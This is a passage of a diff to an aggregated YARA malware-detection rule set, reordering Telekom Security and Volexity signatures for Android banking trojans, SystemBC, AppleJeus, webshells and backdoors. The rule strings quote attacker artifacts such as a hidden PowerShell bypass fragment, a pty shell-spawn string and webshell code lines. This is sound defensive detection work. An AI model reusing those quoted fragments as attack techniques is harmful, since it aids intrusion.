ascii wide + $payload_decryption = { 66 0F F8 C1 66 0F EF C2 66 0F F8 C1 } + $mz = "MZ" ascii + $rufus = "https://rufus.ie/" ascii condition: - $a + $mz at 0 and $payload_decryption and $rufus } rule TELEKOM_SECURITY_Fake_Gzip_Bokbot_202104 { @@ -200718,125 +202568,6 @@ rule TELEKOM_SECURITY_Win_Iceid_Core_202104 : FILE condition: uint16(0)==0x5a4d and filesize <5000KB and ($internal_name or all of ($s*)) or all of them } -rule TELEKOM_SECURITY_Android_Teabot : FILE -{ - meta: - description = "matches on dumped, decrypted V/DEX files of Teabot" - author = "Thomas Barabosch, Telekom Security" - id = "9db701bf-be84-5236-97f7-67043cf3ea93" - date = "2021-09-14" - modified = "2021-09-14" - reference = "https://github.com/telekom-security/malware_analysis/" - source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/teabot.yar#L1-L23" - license_url = "N/A" - hash = "37be18494cd03ea70a1fdd6270cef6e3" - logic_hash = "5aa7fdb191c36510c7698f3eae40c0b7f15c944b8f60113bbb4e40fc926579b8" - score = 75 - quality = 45 - tags = "FILE" - version = "20210819" - - strings: - $dex = "dex" - $vdex = "vdex" - $s1 = "ERR 404: Unsupported device" - $s2 = "Opening inject" - $s3 = "Prevented samsung power off" - $s4 = "com.huawei.appmarket" - $s5 = "kill_bot" - $s6 = "kloger:" - $s7 = "logged_sms" - $s8 = "xiaomi_autostart" - - condition: - ($dex at 0 or $vdex at 0) and 6 of ($s*) -} -rule TELEKOM_SECURITY_Android_Flubot : FILE -{ - meta: - description = "matches on dumped, decrypted V/DEX files of Flubot version > 4.2" - author = "Thomas Barabosch, Telekom Security" - id = "d6d1eebc-961f-5032-af04-4c95f364a74d" - date = "2021-09-14" - modified = "2021-09-14" - reference = "https://github.com/telekom-security/malware_analysis/" - source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/flubot.yar#L1-L19" - license_url = "N/A" - hash = "37be18494cd03ea70a1fdd6270cef6e3" - logic_hash = "db22e0890dfad7cb9cb1d18aadb406514e5e8874051aa7f07a4bb93da9db68df" - score = 75 - quality = 45 - tags = "FILE" - version = "20210720" - - strings: - $dex = "dex" - $vdex = "vdex" - $s1 = "LAYOUT_MANAGER_CONSTRUCTOR_SIGNATURE" - $s2 = "java/net/HttpURLConnection;" - $s3 = "java/security/spec/X509EncodedKeySpec;" - $s4 = "MANUFACTURER" - - condition: - ($dex at 0 or $vdex at 0) and 3 of ($s*) -} -rule TELEKOM_SECURITY_Win_Systembc_20220311 : FILE -{ - meta: - description = "Detects unpacked SystemBC module" - author = "Thomas Barabosch, Deutsche Telekom Security" - id = "39e1a131-bd2c-56e9-961f-2b2c31f29e85" - date = "2022-03-13" - modified = "2022-03-13" - reference = "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6" - source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/systembc/systembc.yara#L1-L27" - license_url = "N/A" - logic_hash = "2f6e2c4c786941f800678e22679d4b81d1097a46c2555ae70e745df1b997c1c8" - score = 75 - quality = 70 - tags = "FILE" - sharing = "TLP:WHITE" - hash_1 = "c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5" - in_memory = "True" - - strings: - $sx1 = "-WindowStyle Hidden -ep bypass -file" ascii - $sx2 = "BEGINDATA" ascii - $sx3 = "GET %s HTTP/1.0" ascii - $s5 = "User-Agent:" ascii - $s8 = "ALLUSERSPROFILE" ascii - - condition: - ( uint16(0)==0x5a4d and filesize <30KB and 2 of ($sx*)) or all of them -} -rule TELEKOM_SECURITY_Vatet_Loader_Rufus_Backdoor : DEFRAY777 -{ - meta: - description = "Detects backdoored Rufus with Vatet Loader of Defray777" - author = "Thomas Barabosch, Deutsche Telekom Security" - id = "1f6fa228-300c-59de-b89c-3cbdce1b6374" - date = "2022-03-18" - modified = "2022-03-18" - reference = "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777" - source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/defray777/vatet_loader.yar#L1-L27" - license_url = "N/A" - logic_hash = "3767398112759689078f992eb272cfec3e59f6d9ca30f8da68c2053e1217fd18" - score = 75 - quality = 20 - tags = "DEFRAY777" - sharing = "TLP:WHITE" - hash_1 = "c9c1caae50459896a15dce30eaca91e49e875207054d98e32e16a3e203446569" - hash_2 = "0cb8fc89541969304f3bf806e938452b36348bdd0280fc8f4e9221993e745334" - in_memory = "False" - - strings: - $payload_decryption = { 66 0F F8 C1 66 0F EF C2 66 0F F8 C1 } - $mz = "MZ" ascii - $rufus = "https://rufus.ie/" ascii - - condition: - $mz at 0 and $payload_decryption and $rufus -} rule TELEKOM_SECURITY_Crylock_Binary : FILE { meta: @@ -200907,577 +202638,321 @@ rule TELEKOM_SECURITY_Crylock_Hta : FILE condition: filesize <100KB and 8 of ($s*) } -/* - * YARA Rule Set - * Repository Name: Volexity - * Repository: https://github.com/volexity/threat-intel - * Retrieval Date: 2024-09-08 - * Git Commit: f5ecc7bce2475e6bd1038a807bca3e313640fdf3 - * Number of Rules: 91 - * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) - * - * - * LICENSE - * - * Copyright 2022 by Volexity, Inc. - -The 2-Clause BSD License - -Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: -1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. -2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - */ -rule VOLEXITY_Apt_Win_Applejeus_Oct22 : LAZARUS -{ - meta: - description = "Detects AppleJeus DLL samples." - author = "threatintel@volexity.com" - id = "f88e2253-e296-57d8-a627-6cb4ccff7a92" - date = "2022-11-03" - modified = "2022-12-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L1-L16" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "46f3325a7e8e33896862b1971f561f4871670842aecd46bcc7a5a1af869ecdc4" - score = 75 - quality = 80 - tags = "LAZARUS" - hash1 = "82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $s1 = "HijackingLib.dll" ascii - - condition: - $s1 -} -rule VOLEXITY_Apt_Win_Applejeus_B_Oct22 : LAZARUS -{ - meta: - description = "Detected AppleJeus unpacked samples." - author = "threatintel@volexity.com" - id = "8586dc64-225b-5f28-a6d6-b9b6e8f1c815" - date = "2022-11-03" - modified = "2022-12-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L18-L41" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "76f3c9692ea96d3cadbbcad03477ab6c53445935352cb215152b9b5483666d43" - score = 75 - quality = 80 - tags = "LAZARUS" - hash1 = "9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $key1 = "AppX7y4nbzq37zn4ks9k7amqjywdat7d" - $key2 = "Gd2n5frvG2eZ1KOe" - $str1 = "Windows %d(%d)-%s" - $str2 = "&act=check" - - condition: - ( any of ($key*) and 1 of ($str*)) or all of ($str*) -} -rule VOLEXITY_Apt_Win_Applejeus_C_Oct22 : LAZARUS -{ - meta: - description = "Detected AppleJeus unpacked samples." - author = "threatintel@volexity.com" - id = "6f467e0e-2932-5ba7-9fe3-0f9d28466e23" - date = "2022-11-03" - modified = "2022-12-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L43-L63" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "566f5840ff2023f4fd8ffaa9ba1308a7012913cf587838173358b8f1fe4abca8" - score = 75 - quality = 80 - tags = "LAZARUS" - hash1 = "a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $str1 = "%sd.e%sc \"%s > %s 2>&1\"" wide - $str2 = "tuid" - $str3 = "content" - $str4 = "payload" - $str5 = "fconn" - $str6 = "Mozilla_%lu" - - condition: - 5 of them -} -rule VOLEXITY_Apt_Win_Applejeus_D_Oct22 : LAZARUS -{ - meta: - description = "Detected AppleJeus unpacked samples." - author = "threatintel@volexity.com" - id = "80d2821b-a437-573e-9e9d-bf79f9422cc9" - date = "2022-11-10" - modified = "2022-12-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L65-L83" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "23c0642e5be15a75a39d089cd52f2f14d633f7af6889140b9ec6e53c5c023974" - score = 75 - quality = 80 - tags = "LAZARUS" - hash1 = "a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $reg = "Software\\Bitcoin\\Bitcoin-Qt" - $pattern = "%s=%d&%s=%s&%s=%s&%s=%d" - $exec = " \"%s\", RaitingSetupUI " - $http = "Accept: */*" wide - - condition: - all of them -} -rule VOLEXITY_Cf_Office_Win_Macro_Lazarus_Jeus_B : LAZARUS -{ - meta: - description = "Detects macros used by the Lazarus threat actor to distribute AppleJeus." - author = "threatintel@volexity.com" - id = "ac4d4e82-e29f-5134-999d-b8dcef59d285" - date = "2022-11-03" - modified = "2022-12-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L85-L104" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "e55199e6ad26894f98e930cd4716127ee868872d08ada1c44675e4db1ec27894" - score = 75 - quality = 80 - tags = "LAZARUS" - hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b" - memory_suitable = 0 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $a1 = ", vbDirectory) = \"\" Then" ascii - $a2 = ".Caption & " ascii - $a3 = ".nodeTypedValue" ascii - $a4 = ".Application.Visible = False" ascii - $a5 = " MkDir (" ascii - - condition: - all of ($a*) -} -rule VOLEXITY_Cf_Office_Win_Macro_Lazarus_Jeus : LAZARUS -{ - meta: - description = "Detects malicious documents used by Lazarus in a campaign dropping the AppleJeus malware." - author = "threatintel@volexity.com" - id = "03d41314-c19f-566f-9571-48915a292433" - date = "2022-11-02" - modified = "2022-12-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L106-L124" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "8e5a9042ec1ddaf4da511743434461c9865f259c30a9b02c28475b3a59fe4fc1" - score = 75 - quality = 80 - tags = "LAZARUS" - hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $s1 = "0M8R4K" ascii - $s2 = "bin.base64" ascii - $s3 = "dragon" ascii - $s4 = "Workbook_Open" ascii - - condition: - 3 of ($s*) -} -rule VOLEXITY_Webshell_Jsp_Converge : WEBSHELL -{ - meta: - description = "File upload webshell observed in incident involving compromise of Confluence server." - author = "threatintel@volexity.com" - id = "2a74678e-cb00-567c-a2e0-2e095f3e5ee8" - date = "2022-06-01" - modified = "2022-06-06" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L1-L15" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "bb48516342eddd48c35e6db0eb74f95e116dc723503552b99ba721b5bdb391e5" - score = 75 - quality = 80 - tags = "WEBSHELL" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $s1 = "if (request.getParameter(\"name\")!=null && request.getParameter(\"name\").length()!=0){" ascii - - condition: - $s1 -} -rule VOLEXITY_General_Jsp_Possible_Tiny_Fileuploader : GENERAL WEBSHELLS FILE -{ - meta: - description = "Detects small .jsp files which have possible file upload utility." - author = "threatintel@volexity.com" - id = "d111aab3-af6e-59cb-a445-ebd4a454fb9a" - date = "2022-06-01" - modified = "2022-06-06" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L17-L50" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "bad62e6fd33ffb0d8551302fd7f85528066992c272b670d44a33b5b2eb174886" - score = 75 - quality = 80 - tags = "GENERAL, WEBSHELLS, FILE" - hash1 = "4addb9bc9e5e1af8fda63589f6b3fc038ccfd651230fa3fa61814ad080e95a12" - memory_suitable = 0 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $required1 = "request." ascii - $required2 = "java.io.FileOutputStream" ascii - $required3 = ".write" ascii - $encoding1 = "java.util.Base64" ascii - $encoding2 = "crypto.Cipher" ascii - $encoding3 = ".misc.BASE64Decoder" ascii - - condition: - ( filesize <4KB and all of ($required*) and any of ($encoding*)) or ( filesize <600 and all of ($required*)) -} -rule VOLEXITY_Webshell_Java_Realcmd : COMMODITY WEBSHELLS -{ - meta: - description = "Detects the RealCMD webshell, one of the payloads for BEHINDER." - author = "threatintel@volexity.com" - id = "d5e7e3c8-a0aa-5c2e-8a2d-654e066593eb" - date = "2022-06-01" - modified = "2022-06-06" - reference = "https://github.com/Freakboy/Behinder/blob/master/src/main/java/vip/youwe/sheller/payload/java/RealCMD.java" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L52-L79" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "244add844570b23e5df23882a3fdacf894f3e201b01373d949b0752361960536" - score = 75 - quality = 80 - tags = "COMMODITY, WEBSHELLS" - hash1 = "a9a30455d6f3a0a8cd0274ae954aa41674b6fd52877fafc84a9cb833fd8858f6" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $fn1 = "runCmd" wide ascii fullword - $fn2 = "RealCMD" ascii wide fullword - $fn3 = "buildJson" ascii wide fullword - $fn4 = "Encrypt" ascii wide fullword - $s1 = "AES/ECB/PKCS5Padding" ascii wide - $s2 = "python -c 'import pty; pty.spawn" ascii wide - $s3 = "status" ascii wide - $s4 = "success" ascii wide - $s5 = "sun.jnu.encoding" ascii wide - $s6 = "java.util.Base64" ascii wide - - condition: - all of ($fn*) or all of ($s*) -} -rule VOLEXITY_Apt_Js_Sharpext : SHARPTONGUE -{ - meta: - description = "A malicious Chrome browser extention used by the SharpTongue threat actor to steal mail data from a victim." - author = "threatintel@volexity.com" - id = "61b5176a-ff73-5fce-bc70-c9e09bb5afed" - date = "2021-09-14" - modified = "2022-07-28" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-07-28 SharpTongue SharpTongue Deploys Clever Mail-Stealing Browser Extension SHARPEXT/yara.yar#L1-L47" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "0ed58c8646582ee36aeac650fac02d1e4962d45c0f6a24783c021d9267bed192" - score = 75 - quality = 80 - tags = "SHARPTONGUE" - hash1 = "1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00" - hash2 = "6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4" - hash3 = "6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c" - memory_suitable = 1 - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - - strings: - $s1 = "\"mode=attach&name=\"" ascii - $s2 = "\"mode=new&mid=\"" ascii - $s3 = "\"mode=attlist\"" ascii - $s4 = "\"mode=list\"" ascii - $s5 = "\"mode=domain\"" ascii - $s6 = "\"mode=black\"" ascii - $s7 = "\"mode=newD&d=\"" ascii - $mark1 = "chrome.runtime.onMessage.addListener" ascii - $mark2 = "chrome.webNavigation.onCompleted.addListener" ascii - $enc1 = "function BSue(string){" ascii - $enc2 = "function BSE(input){" ascii - $enc3 = "function bin2hex(byteArray)" ascii - $xhr1 = ".send(\"mode=cd1" ascii - $xhr2 = ".send(\"mode=black" ascii - $xhr3 = ".send(\"mode=domain" ascii - $xhr4 = ".send(\"mode=list" ascii - $manifest1 = "\"description\":\"advanced font\"," ascii - $manifest2 = "\"scripts\":[\"bg.js\"]" ascii - $manifest3 = "\"devtools_page\":\"dev.html\"" ascii - - condition: - (5 of ($s*) and all of ($mark*)) or all of ($enc*) or 3 of ($xhr*) or 2 of ($manifest*) -} -rule VOLEXITY_Webshell_Java_Behinder_Shellservice : WEBSHELLS COMMODITY +rule TELEKOM_SECURITY_Get_Windows_Proxy_Configuration : CAPABILITY HACKTOOL { meta: - description = "Looks for artifacts generated (generally seen in .class files) related to the Behinder framework." - author = "threatintel@volexity.com" - id = "21c1e3e9-d048-5c60-9c21-8e54b27f359a" - date = "2022-03-18" - modified = "2022-07-28" - reference = "https://github.com/MountCloud/BehinderClientSource/blob/master/src/main/java/net/rebeyond/behinder/core/ShellService.java" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L1-L23" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "373a8d4ef81e9bbbf1f24ebf0389e7da4b73f88786cc8e1d286ccc9f4c36debc" + description = "Queries Windows Registry for proxy configuration" + author = "Thomas Barabosch, Deutsche Telekom Security" + id = "b67b0b70-a95f-5c65-a522-ef4f41e36159" + date = "2022-01-14" + modified = "2023-12-12" + reference = "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-ie-clientnetworkprotocolimplementation-hklmproxyserver" + source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L44-L57" + license_url = "N/A" + logic_hash = "db52782a56d42f6e460466ea46993490bbbceeb7422d45211f064edb2e37a8eb" score = 75 - quality = 30 - tags = "WEBSHELLS, COMMODITY" - hash1 = "9a9882f9082a506ed0fc4ddaedd50570c5762deadcaf789ac81ecdbb8cf6eff2" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 + quality = 70 + tags = "CAPABILITY, HACKTOOL" strings: - $s1 = "CONNECT" ascii fullword - $s2 = "DISCONNECT" ascii fullword - $s3 = "socket_" ascii fullword - $s4 = "targetIP" ascii fullword - $s5 = "targetPort" ascii fullword - $s6 = "socketHash" ascii fullword - $s7 = "extraData" ascii fullword + $a = "Software\\Microsoft\\Windows\\Currentversion\\Internet Settings" ascii wide + $b = "ProxyEnable" ascii wide + $c = "ProxyServer" ascii wide condition: all of them } -rule VOLEXITY_General_Java_Encoding_And_Classloader : WEBSHELLS GENERAL FILE +rule TELEKOM_SECURITY_Cn_Utf8_Windows_Terminal : CAPABILITY HACKTOOL { meta: - description = "Identifies suspicious java-based files which have all the ingredients required for a webshell." - author = "threatintel@volexity.com" - id = "7de5449d-de70-5153-b1b1-8a995ac8b7a0" - date = "2022-04-07" - modified = "2022-07-28" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L25-L43" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "21c226b03451eb98a8be5b26a9f00169f16454ecd21d4131c9991b63d2e3c8cd" - score = 65 - quality = 80 - tags = "WEBSHELLS, GENERAL, FILE" - hash1 = "0d5dc54ef77bc18c4c5582dca4619905605668cffcccc3829e43c6d3e14ef216" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 0 + description = "This is a (dirty) hack to display UTF-8 on Windows command prompt." + author = "Thomas Barabosch, Deutsche Telekom Security" + id = "a1beee71-c526-58fb-a255-dba55ef7535b" + date = "2022-01-14" + modified = "2023-12-12" + reference = "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf" + source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L59-L71" + license_url = "N/A" + logic_hash = "4c91280c3d6d3b48c4ee11bf3d0c2baecee1368fbf3951c0a3bf386454c557cf" + score = 40 + quality = 20 + tags = "CAPABILITY, HACKTOOL" strings: - $s1 = "javax.crypto.spec.SecretKeySpec" ascii - $s2 = "java/security/SecureClassLoader" ascii - $s3 = "sun.misc.BASE64Decoder" ascii + $a = " chcp 65001 " ascii wide condition: - filesize <50KB and all of them + $a } -rule VOLEXITY_Webshell_Php_Str_Replace_Create_Func : WEBSHELLS GENERAL FILE +rule TELEKOM_SECURITY_Android_Teabot : FILE { meta: - description = "Looks for obfuscated PHP shells where create_function() is obfuscated using str_replace and then called using no arguments." - author = "threatintel@volexity.com" - id = "e0a5965c-54c3-5699-a45b-58f7152574dd" - date = "2022-04-04" - modified = "2022-07-28" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L45-L73" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "6a9ded1f1a8e4b8ae5f3db06f71bec6e9f62b6126b7444408d6319a35ed23827" + description = "matches on dumped, decrypted V/DEX files of Teabot" + author = "Thomas Barabosch, Telekom Security" + id = "9db701bf-be84-5236-97f7-67043cf3ea93" + date = "2021-09-14" + modified = "2021-09-14" + reference = "https://github.com/telekom-security/malware_analysis/" + source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/teabot.yar#L1-L23" + license_url = "N/A" + hash = "37be18494cd03ea70a1fdd6270cef6e3" + logic_hash = "5aa7fdb191c36510c7698f3eae40c0b7f15c944b8f60113bbb4e40fc926579b8" score = 75 - quality = 80 - tags = "WEBSHELLS, GENERAL, FILE" - hash1 = "c713d13af95f2fe823d219d1061ec83835bf0281240fba189f212e7da0d94937" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 0 + quality = 45 + tags = "FILE" + version = "20210819" strings: - $php = "<?php" - $s = "=str_replace(" ascii - $anon_func = "(''," ascii + $dex = "dex" + $vdex = "vdex" + $s1 = "ERR 404: Unsupported device" + $s2 = "Opening inject" + $s3 = "Prevented samsung power off" + $s4 = "com.huawei.appmarket" + $s5 = "kill_bot" + $s6 = "kloger:" + $s7 = "logged_sms" + $s8 = "xiaomi_autostart" condition: - filesize <100KB and $php at 0 and for any i in (1..#s) : ( for any j in (1..#anon_func) : ( uint16be(@s[i]-2)== uint16be(@anon_func[j]-2))) + ($dex at 0 or $vdex at 0) and 6 of ($s*) } -rule VOLEXITY_Trojan_Golang_Pantegana : COMMODITY +rule TELEKOM_SECURITY_Android_Flubot : FILE { meta: - description = "Detects PANTEGANA, a Golang backdoor used by a range of threat actors due to its public availability." - author = "threatintel@volexity.com" - id = "b6154165-68e0-5986-a0cf-5631d369c230" - date = "2022-03-30" - modified = "2022-07-28" - reference = "https://github.com/elleven11/pantegana" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L75-L99" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "791a664a6b4b98051cbfacb451099de085cbab74d73771709377ab68a5a23d2b" + description = "matches on dumped, decrypted V/DEX files of Flubot version > 4.2" + author = "Thomas Barabosch, Telekom Security" + id = "d6d1eebc-961f-5032-af04-4c95f364a74d" + date = "2021-09-14" + modified = "2021-09-14" + reference = "https://github.com/telekom-security/malware_analysis/" + source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/flubot.yar#L1-L19" + license_url = "N/A" + hash = "37be18494cd03ea70a1fdd6270cef6e3" + logic_hash = "db22e0890dfad7cb9cb1d18aadb406514e5e8874051aa7f07a4bb93da9db68df" score = 75 - quality = 80 - tags = "COMMODITY" - hash1 = "8297c99391aae918f154077c61ea94a99c7a339166e7981d9912b7fdc2e0d4f0" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - memory_suitable = 1 + quality = 45 + tags = "FILE" + version = "20210720" strings: - $s1 = "RunFingerprinter" ascii - $s2 = "SendSysInfo" ascii - $s3 = "ExecAndGetOutput" ascii - $s4 = "RequestCommand" ascii - $s5 = "bindataRead" ascii - $s6 = "RunClient" ascii - $magic = "github.com/elleven11/pantegana" ascii + $dex = "dex" + $vdex = "vdex" + $s1 = "LAYOUT_MANAGER_CONSTRUCTOR_SIGNATURE" + $s2 = "java/net/HttpURLConnection;" + $s3 = "java/security/spec/X509EncodedKeySpec;" + $s4 = "MANUFACTURER" condition: - 5 of ($s*) or $magic + ($dex at 0 or $vdex at 0) and 3 of ($s*) } -rule VOLEXITY_Trojan_Any_Pupyrat_B : COMMODITY +rule TELEKOM_SECURITY_Win_Systembc_20220311 : FILE { meta: - description = "Detects the PUPYRAT malware family, a cross-platform RAT written in Python." - author = "threatintel@volexity.com" - id = "1da1e5ba-cf00-5935-b3d1-0ff2713b7e34" - date = "2022-04-07" - modified = "2022-07-28" - reference = "https://github.com/n1nj4sec/pupy" - source_url = 